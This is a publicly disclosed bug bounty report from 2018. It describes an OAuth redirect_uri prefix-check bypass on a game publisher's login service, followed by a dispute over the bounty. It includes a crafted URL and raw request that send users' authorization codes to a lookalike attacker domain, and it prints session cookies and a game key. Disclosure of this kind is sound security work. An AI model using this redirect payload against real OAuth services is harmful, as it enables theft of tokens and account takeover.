Stealing Users OAUTH Tokens via redirect_uri
State Resolved (Closed)
Disclosed publicly 2018-09-14T12:24:09.249Z


Timeline
ethancruize submitted a report to BOHEMIA INTERACTIVE a.s.
2018-09-04T10:30:38.885Z

Hi,
I would like to report an open redirection on the OAuth redirect_uri which can lead to users' OAuth tokens being leaked to any malicious user.

Detail

During the OAuth flow, the redirect_uri on https://accounts.bistudio.com is not properly validated to ensure the URL given is proper; as such, a bypass of the filter is possible, and thereby it is possible to exfiltrate users' OAuth tokens to a non-existent domain.

On clicking Login on https://xbox.dayz.com, an OAuth request is triggered to accounts.bistudio.com. The endpoint checks whether the redirect_uri starts with https://xbox.dayz.com and does not check the ending bits, so it is possible to inject anything after that.

As an example, I injected https://xbox.dayz.comtest.com; the server's whitelist is bypassed and a redirect is performed to https://xbox.dayz.comtest.com with the code and state values.

Steps to Reproduce

  • Log in to any website in scope
  • After login, access the following URL:
https://accounts.bistudio.com/api/auth?response_type=code&redirect_uri=http%3A%2F%2Fxbox.dayz.comtest.com%2Fapi%2Fauth%2Fcallback&state=OCoU2LvhmzLGAZ03DWem5QNs&client_id=%24edd1bfdc470df4b8d7b81c2683fc6d3
  • On accessing it, you will get redirected to xbox.dayz.comtest.com with the OAuth access code and state. Registering such a domain is possible, and when any logged-in user accesses the URL it is possible to steal their OAuth credentials.

RAW Request

GET /api/auth?response_type=code&redirect_uri=http%3A%2F%2Fxbox.dayz.comtest.com%2Fapi%2Fauth%2Fcallback&state=OCoU2LvhmzLGAZ03DWem5QNs&client_id=%24edd1bfdc470df4b8d7b81c2683fc6d3 HTTP/1.1
Host: accounts.bistudio.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://incubator.bohemia.net/
Cookie: cookieconsent_dismissed=yes; bi.accounts.connect.sid=s%3AEbOE7LAPYR9IJO8ocyKuhNoIx_qXNt7_.UWaqiLeZPbgCSPM5nTvWUY2HiRYUXzEjw%2BRPxP3optA; bi_store_auth_session=eyJpdiI6IkcxSWloOVwvdngyaVFjZE9WM012ZzZMRmpkY1VnN1wvOW5abnkyYlNBVklaMD0iLCJ2YWx1ZSI6IjRpUFRUNzFkNElkWkZWeUc4U2o1TkNBaytURlJnVEVyaVFlMTJEc1pjcFR6XC9wUjlHdjd2cDRNQXFaN3hlZjVodHFMaW84WVFxWVJvUG1DOE4xTmtqUT09IiwibWFjIjoiZmRkZThlYjliMmZhMjc4YzBhMWVjMThkN2UxOTc5NmY3MjQ1YTc0NGFlY2FmNGVlNDUwOTU4ZjZmMGU5YTMwMSJ9
Connection: close
Upgrade-Insecure-Requests: 1

Impact

Due to a validation bypass in the redirect_uri parameter in the OAuth flow, it is possible to redirect authenticated users to arbitrary domains with their OAuth credentials, from which it is possible to take over their account.

Best Regards,
EC

Regards,
Frans

ethancruize Activities::Comment
2018-09-04T10:31:48.131Z
My report contains clear steps to reproduce the vulnerability; I have mentioned the impact in the Impact section. Yes, the domain affected is very much in scope.


ethancruize Activities::Comment
2018-09-06T19:37:14.938Z
Hi, has anyone looked into this yet?


freespirit Activities::BugResolved
2018-09-07T14:56:59.429Z
Hello, this was an issue with a short-lived website that is now offline. But despite that, we have modified our filters so your link does not work anymore. As a token of thanks please accept this Steam Key for Arma 3: BEFXX-ZGL4P-4AQ6G


Activities::NotEligibleForBounty
2018-09-07T14:57:07.946Z


ethancruize Activities::Comment
2018-09-07T15:40:52.323Z
Hi, it's a high-risk vulnerability since using this it's possible to steal users' OAuth tokens; it really doesn't matter if the domain is short-lived. If an attacker knew this information he would have used this already and probably got access to users' tokens.


ethancruize Activities::AgreedOnGoingPublic
2018-09-07T16:16:18.738Z
Let everyone see how "BOHEMIA INTERACTIVE" treats researchers efforts.


rvn Activities::Comment
2018-09-10T09:54:23.241Z
Just to clarify, the reason the issue wasn't rewarded with a bounty is because it was eliminated before it got to the developer in question, effectively making it a duplicate. He did at least do some filter modifications so we could give out at least something for this. We still cannot reward duplicates, be it HackerOne's or internal duplicates.


rvn Activities::ReportSeverityUpdated
2018-09-10T09:57:57.407Z


rvn Activities::AgreedOnGoingPublic
2018-09-14T12:24:09.142Z
Disclosed as requested


rvn Activities::ReportBecamePublic
2018-09-14T12:24:09.283Z